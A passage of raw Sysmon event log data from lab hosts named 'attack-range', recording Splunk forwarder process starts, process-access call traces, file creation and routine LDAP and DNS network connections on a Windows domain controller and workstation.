Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-102D-6216-E204-000000003802}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-102D-6216-E204-000000003802}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.758{C8EA50B7-102D-6216-E204-000000003802}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89E4FE00E7BF3CE8BA43C659630622E6,SHA256=131F796A1C94CD31D1C82045FE41B20F7060422EF2B75F3815D589532FEED1AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-102E-6216-E304-000000003802}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-102E-6216-E304-000000003802}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.257{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-102E-6216-E304-000000003802}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.258{C8EA50B7-102E-6216-E304-000000003802}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000286748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:59.543{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53355-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:03.010{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9464602B2E0413DD51FC0E8523C7869,SHA256=8BE0D84C1EDEE4C55FFC5D051F918289D498DE2E524E4842337D22BCCC26589B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:04.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3D73E074682F30D5FF500B41022E52,SHA256=1B6748AE08BC1CB7A1CEFB0EE4F25E21472437C2E755EA666B50535424298031,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:03.169{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53356-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:03.169{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53356-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.485{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59669- 354300x8000000000000000286767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:02.483{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local62071- 10341000x8000000000000000286766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1030-6216-E404-000000003802}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1030-6216-E404-000000003802}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.070{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1030-6216-E404-000000003802}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.071{C8EA50B7-1030-6216-E404-000000003802}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 